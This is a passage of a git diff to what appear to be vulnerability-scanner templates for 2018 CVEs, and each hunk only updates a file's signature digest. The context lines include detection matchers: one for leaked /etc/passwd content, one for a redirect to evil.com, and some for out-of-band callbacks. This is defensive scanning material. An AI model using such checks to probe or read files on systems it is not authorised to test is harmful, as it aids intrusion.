4a0a004730450221009113ce736684e7e1a148a1302d8a04148464e5ddde61c23015849ff2e4d8fccb022037afb54d69659e04e5cc3451742f8ce7c7eca31db6ec2f8ebaaa3dff489f126c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 5ffcb06902..aa7c5dcea3 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -38,4 +38,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100e348737b605b08be54e205caa8c5bab94855c04ab9eade358706b4709167b4bf022100c75c81f077961bd41bc6d037f8587b350bb3eab8bd2866d54c50beb721fc72be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100949517a3eac8a056c1e9acd8ebe678f655aa07b406466d194d8de193f535f39c022100d6c72df1a6030588797e0c02b7dc2710ed0c5317d650dd38b93142d382e71851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index eb5c8eee5f..792ee61d48 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220008949825f275d63efd906265e62d12c7fbf214cd71d1a088371ed0186d4774d0221008bfadcfef8c5eff615186f26cf48f5fc7377e33e5417428297b76323f787d06c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c4ddbcd4e1d9a14a467c108e82ff87b32ec9351cb237830dd61e9ade6527fd0022040b2a10a4d6e4ce8557f04d663b75210e2f1e9ff391b65f66608c885c794c323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index e533360cc3..a3eb882dcb 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f6288b19120fdaa738aed697a4829c5d9b0fe554a829787bdc32524cda307310022100d6d0757761cada3d4070c3f656fb94c7dc20102669037c70944c9edb8e2ed9e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b202c288bd1e15a7d89b1caecc1410db8797f69a14633d5c8a74b1748bf56fa8022100db7468bbeddcc4266f3164d821a88fd96a662f2a52dcca6d1576905eb5fddc48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 1db72f885d..b02f2d9eaa 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fcf299af1032aa6610f335ae98719a2e85906f04c85a322ec5762ca0c861a222022100a8a886e147ad03e0b1b3c95aa90582f19f6ee4bda1a623ac5c265e2d66a72054:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012fd644ff29e292d16397f6d0679f667836027196c255b79ae333ef5543ac7ab022100e17e63cb7b6a6e21b6b49ac853faa9726f865be3d188907649f82d17b6e4d009:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 8c0da9c264..87397a262c 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -76,4 +76,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ea3883204a4effb1a5a6528cb554f7cbac69a7b5e7a10098686e742f128cfc8022100f88820e3ea537d64a035cfa822a942de6c1bbc332b57bd38d2e45129a1e03990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026aeb3406a7fecadfcb7958cdc0c7ba305b97896086d1b34fecf361a588328ba022100dd4848048237e7bdafb9bab85ab6c1c3331c0c7ed11f1d78d489c71b65943126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index da6f2bfdb4..0c3db1cbe1 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200bfc10d29eb9db4a52fd0ff17235654873176c4e7b8bf8d17a7d42e698a1d54c022100b8f6c1a7a225b6b7a9c6b392c59ef6a1de05c0007211c4402c9248c4b12abb5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206986b3f53cca07224add9544a3295e75db96006c6e1a9a521b8cd0f9d893332102203dbd5b8aad9b6993d7de7700a1786944f87f0165a471e191553114fffc2683a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 8747d76854..a2e4bf1662 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -43,4 +43,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a00483046022100edc7c7acd7e9ddc8f6d19c366651d30ec02b31f2a47e4d95062c11d2b10dd2af022100a6690a7c1cf14bfc7e282c557704e8e67689cecb4da7ded13590108920be6e78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c97cbea0df85037002eecfc7fb64125e5af230706eccf26d39cb0fb4f92152e02202d2af6683e7ba0c2fca6bfde5c103aa5de7cde49ae3dc36a7c3c687c6dd3bc4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index dee4aa52f8..24444fcdd3 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7cecd18d3bc31ddf34dc595afa19c5d22c668abd3ef2ef12f0e82cd3e486df1022100f7b1ad1b18cc5e23c63868452b90d0ff7c62138abf09559d515910fcccbfcb45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200aefec87d99f7d3c2251f23d8d02f64dea588e33bd14d50d4d7262eee09ef4550220165611daaf773656b72e4455e07ddbac924c415812439b47c3003ceed1a24161:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 29fbf3fb44..6e609d03de 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -49,4 +49,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 4a0a0047304502207e0c66bf2257b1f95bc3917f50ab45b30e6a4dd83496c1bf9b331e02bfaafc9f022100a199a8737d8081dc0061ef53e4d00eee14663a6e2991c07c59b70a9b574217f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203044bfb75d0f9d479c7e175ca1342877cca6abb5166055cbd3ee3bb40d42f3a8022100ecee49ec214ae2c3332905fc75724145a54f3ed121b767a5bc262562c15e896f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index b896206778..8431dae512 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - http -# digest: 490a0046304402207029b8ea7fa8c68f08425c2f54517e7d9f59d797a3269122bbd94131d8811baa02207c305c3139e642a717567be4d31ca357f108bc6d00d3217139e44fdd3c0ebfa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0a00a833305998789a8aaea03f13446f98cb04818cc5d9b73fb8d847b1a1c88022100b30c388646abb2878e66f8d4b8487e2e2eb9b73ac5ebf833abcda563c4295d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index b55d55fa8c..edde248468 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -38,4 +38,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100e6752e0d11aff4596dca4e54bcf35d1709b4f33e18cdce8830251cbb9c04626202204ba254029b736eb032ee010f1405844c938a31d08a5f71fb5a054df4f493c727:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207986235227f992fb2dc6288987831de11688b84ec1ea9faf69fdd331dba58d92022059305c23cbd2261ac8d80ad76a2f31c9f5794d62468bcb6baba6ed45d340a209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index a88fe1d43b..ffd0c3fd90 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022031367cb31d4dc9482f6cab37e2f94866dd9c92ba02eccc0e0a41648bf98cd15102206eb324e21841db77697ab3f3113bc4c6f724549d11eeb30741756870f42c1c0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d15032f4f7ba8400fdaf1c0e9983a1254f74e2e35c98e9d5094375b57f8060c02202bc5cae53054abb24bdff331a52a2b61d66b6a766794fc5a9641414d9609dbcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index e9ee717eda..469e4be491 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022030ea9d78b08143eb6a9b24778e5ddcb47733d608d23525ded1598060985eec5a022055ad6cf09b83fa3afd8998ae2c293c7aca0c2414a7b2cd9cd7bb4880c018220c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022029e2cfb33147cce43614d3cef06d2eafce567ca79251b3ac98dd35252eec8c49022100fe990a1b2d8a8fe9a13a7930563a706e660dcf485acdb235813d84616b5a44e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 5d7bf2039f..1f4ebdf790 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -46,4 +46,4 @@ http: - "** Platform sources **" - "** Application sources **" condition: and -# digest: 4a0a00473045022100caf372831772e7dc3291b27557963fe6e4d0972ed8776e9d63b3696166d6564f02207bce46176fcb607294c9b654458450771cd3f26f2cbfeaaafe620bc65dba1835:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af7022759c9a36571af24c76109a3f36b321ea99e6e27d28d878ad59b4402fa902203f6d6287a825eacfa8c95959ebcee6fd5547867d56b5296c299b7b50c3481ed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 2b34bb4cde..ee8f565324 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -44,4 +44,4 @@ http: - "" - "Reader.STATUS" condition: and -# digest: 490a00463044022063a205355fa1d06a6ead93619e675b354d1491a5f90c117527c5f13f5f3dd44c022056937fa2a8b0488a2ba29219d5522c2a1ec39c8eed5b97c3b4c6f788e3b13ad4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038206f1e9237be8e4b9323830bf7151b54be08fe5ee9058eee505aedbe3694b302200b13e3ecf9e1a5fb8817fd485947eb8d01cffe308bc0b06f1781b206b5390fcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 21838499ef..f4705fdde0 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -48,4 +48,4 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" -# digest: 4a0a0047304502200ce2d4efe87a9a002725838e84f97f18d41f8687d30ca0457a11fa3947fbcef9022100b0117104e0bfe4eff4361575be3eb05f5db60801f4b83975728dc12f2c878e94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eedd1fd49ebd4ce6e5d1157608f752b0e28fab2f9b2e1bc07c8290bb034e904902202a9cc8a7a37915c307e762e245830c42bf50f5a59d18fbae0fb321cf5a0fe304:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index df07ab80d6..f652b6e825 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210085d8fbddbeb5957650f4e95e026b14aaccdfce34f39ba2e17aef46dbc14a504002203cea283f109ccb847450587da60f0459b2f3a1ff54c203f98b5104b725b4d136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee491186d7f820fa902e62d3800a1c2a4da10f20efbf0b8c01c0aaa28b90f54b02203019bc02470f6e850e26e25a00dbbb42f03f9c5ca41db93d4820b928fed98e5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 15441d38b2..23f9df48fa 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022047b620e8e0ce5b9f239d17672bdbc010a2ea2503e92d99eead51281386314541022100fa376ae6dafb9770e1761305da2b8eddff166c5916b135d3c8f20e00850714ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 7d3ccc5c16..ba914c3e27 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022026fd2c9dad267c5a6fbd50909f735595b1c7064aed449a41226da2a324634aa8022100f3d8e9e666410b97e2c9b29f619787c9506b2e37599d0a2fc5c66cae27311cfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c766f1703e5ba68f42ba9aeeeae764a68cce93b8ffe1142a31aa756ddfa7f35d022100cdf7e23edcfdeae00378ad2c761463a94a76397f0292e1bc103974e60e581ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index ad0452c9b7..6b4065b260 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099479d2bade258189160293fb9fb6399ae83fe19db85de8045640eb8b8edcac0022066e5d47db305d1c7dd4b45c32568a3f8173f588ff886ea976cc59accf58d4160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075e2c41030fe54a03573eedd13b73338da361a5cf7cdde64ad9615a66b29db0d022002fb16286852eff7677d755545a9c486eac937dad81afa4a11af58624922f892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 15515d9f76..57cd0792c2 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204fb12023533296276ddddb7f4c0dca7e6c90a512bd1603ddac51a9f214397438022100de788991d48ce8d2df6ec03bbf2c6074c55a7efcc4ef73bb412ad4facc6d14aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0bfb7c69afa43d3c0eda41487732187606b25d3949beb05a759c76ce38e998802204f2bb982392edc1387eb4783efa0b3efecf7382f4157824dbe9e782a3afe3b97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 88223b4a19..a0720cc91d 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -49,4 +49,4 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and -# digest: 4a0a00473045022100d20f9bd82d848fd52f8021d862a8aab244b2fa2bbc9dabf59d02ad9ea2fb7ac002207e6d055f2b948e93a99ae4a6b6bdb9ccf54547a21ca1fdd838064f4c54cfc699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008e68e0f36100987b14edc9fcaa5e3f4ff60fac72864fc2d5e90390bf5da58cfb022100c81ae0221517652a2911fe14a63667df979e14b8350ddf892db0f6f01fb6f6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index ed7791ae0a..40159995d4 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -53,4 +53,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100e19dd0c69dd68b88c52971dc65ba9b1552afe873c6552db27c5c84daa1cb5262022100da464e134545f68cf2550c6dfd32c9fd88dce6a8e132622db659a41af2ea16ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb7a951d4ea256b3c26be5303e3c6025046a20944d4e2f92250ab2a566e2bbb2022100b912ca2e566a8f4e2cf8c72901116e0a42d1a7fc5eaadbcac0e88c21b9ec0dd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index f4be0f31f9..cca82bc302 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -40,4 +40,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 4a0a00473045022100d281a66380f218c040583ca45da5631e52ca10dae41652236336600c29e07430022071ccc73e71124a5d104f3732269ed3a1fa1415d0c388c22a28460b188c398bd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b261fe2697190cd7fac57caae056784c0fcdafa77339c5b1b838502a79539d01022021a432a3def85765211df2c94058fa14b19323731d5e4f2f7735033eef2d39b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 6b231c703d..fe214b4bd6 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -42,4 +42,4 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 490a0046304402207fff7a89a291c247ce3e33712e522aaf653c4789d54404d0ab3e15212a5abdb402202536232c184bf37c893b6f45d63519126783206d7e46d26f85e1a8f8322ea575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b5dc9c728ada9404938697a395dca57d6b1eea894e2e730ce1efa90e6a2809e02200eb9ab577689849cf8886120595ad8ae4fbe15e377fc3f6cde6d679f7aa4ece2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 6ec866a6d2..c68fcf4f38 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c61cb461fed0c28ef7b72aaba2cc8b6f340dc281adb0c21cecbd9b08d14f297d02201bd55f622da9fb615643bebcaa087b28cc73287e0592c2ff8b76473f8e6e114a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f17ede491fbfe593d1393352d124774727692d1af2be587e3fc87dcf8e93f04022100e55603fdb8b8a0692aa5a81d66be88b3116003f715912516060d4d873cdaa0d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 96843e8334..05d99eb1b3 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -43,4 +43,4 @@ http: - 'contains(set_cookie, "_icl_current_admin_language")' - 'contains(body, "\">")' condition: and -# digest: 4a0a00473045022025096c0add9eded7737dac192f3967cdd798afe2bea6264336b9416338ca7537022100e17fc6a1cfa18c1d89c565d599d67a015f6c16cd65232e1022bc682a94aa76a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c91adfb25f3ec4d8468fc421881facc63788300478353ff497302d3feb61f4c8022100e031b5018c52ede09224f354170636690fe33fda22a0f5ad6c97887f2c0fb0e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 6cb802f69b..3bbf15eaf2 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022008ca3c376b75bd33f0781f8f393afd285ae62302db8637a426727ee93fd7135e022100e3f92d05fe1c30436b29225aeda8463158fa9b01db4f9649f1791ee0f917f517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022040d49b58fb59c9313657d954c6cb9d9853ed0a1219039a095d03b96f0df8ea78022034828ea0a48b6ade7fb0ff0139eb15584563a87f498e25496e3a96a9613521fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index b746ec522a..4057f74488 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e68d62f7ad1346d100c40736e9b5f836af425f2907ede7b06213c9f8638b606d022100e434c324535cac337bcedad0838fe445311a0dc98a211a8b2cd644145dffe07e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220111e96765224119deafdd5ce9c79d62c3fd52a7b8f5500747510819411ed508a022100c410b7342e61f54439e86a36169b29fecdff7465fe1c43398b27a4545930dad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 7695035da5..1576c98f8f 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220521f81939e04c8b11e7399207b5ff5241471783cac11ccbef6ec58b8bfa303df022100dd39e8d49b1067ee52556b028ba715132fe4ca43582b4964267ec4d526989621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb14a6dd7cf01ae000e5ef5f53ebea391d97089e77f81570af5d6bb491acc55002202d93eea7ac7c3e610b6d2580c34e13afe7d62d660610cec528fd4b6fd558422d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index e2c036aea6..4413cdd0fe 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008ed2619cee872ea0b25fdec8aef5bf8388725b6cbf22e828af2b10dbcd82aa490221008fe627c8e0b749ea1962a991ac79480fb8032491a34d19359a2a5bff957743a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf0a8ffe4337614c161889271ce821db379c50866f5589b5182cfbdfa02d2c4f022100bf7177e04bd660f78c4103992b69276fe379a71ec6bcfb9936acc16a548ba6be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index d60580e891..2d7d5f6c78 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220266494839f4320d0266f61f16a5360640dcce7548bf95fe21794672fa19184ed02204c3cba0704d8c636c1a230a51b042bf23dec8310ea3a55596111ea75d50765c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c12a7b7cf4f6baf7ea5f9d969270d406dea09b2c78643e4d86b8144cd3bc360022072d3fda228a9482a3ab76f3ab608e6b9019bf5fcedbc7852882de6d5e4b1e527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index d1b8c1214c..b1adbeb637 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d6d2ff87dba44b58403ea1645699256e37ab6181b0d2d009e3dff3618cdda8e02202259737bf64ca51ad14e96d0fc9cb8fdc8da62247c979d07c2a1cae0b231d0d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a69b3855c6e60007b8bc823a200d26e375d20ffc7d3daa1a1c9a69e47a7f221f0220373ae8212827f7c7fe8fa4b81ba3a948d5798bc93e4eb0d5c224c7efd237d6b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 64def1fb2f..456c9e67f5 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022038468c968d47ad446ab1cfd510be13223851e833702af08f2fa19e3b2d55cdf302204986bdaf5d56697ea6883a2cbe86d964f6f99ef709a39b20e0150649ba870f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022035e89bc8c009a138dbc9917a0f613f13f3597e5b1f7041a78c64a783803cace2022100ea7a841080fdf3d3ecb80c1b8b15fce48fd2e5a6dc3722fa4daac00a9ae2432a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 2293e9393d..9bb861d3ff 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204859d97f8c4c05b4634fadcc778e895623b6e67684f5f461228f22d1bff79920022100a9cff990042097e99304e63cf6140b081b0fc70c98137a6135d709e89f2b90cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abcda826c27c892b0d75fcb866ad6eecbccc286dc24fcfe436ea67b29140277c022036766297f5fdc87a1864817e7ff49d426e448022f79ae582abb7a8bf80827d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index c219db7980..5d247d418e 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -42,4 +42,4 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' -# digest: 4b0a004830460221009ef7dc8eabdf502adf2ea8bdc74e38ce2cd66868b181fc88754dafb02c670a6c022100bcafbd1d57bce06f3364805d946d141756fe0802f24b53ba677efd1a0342330f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 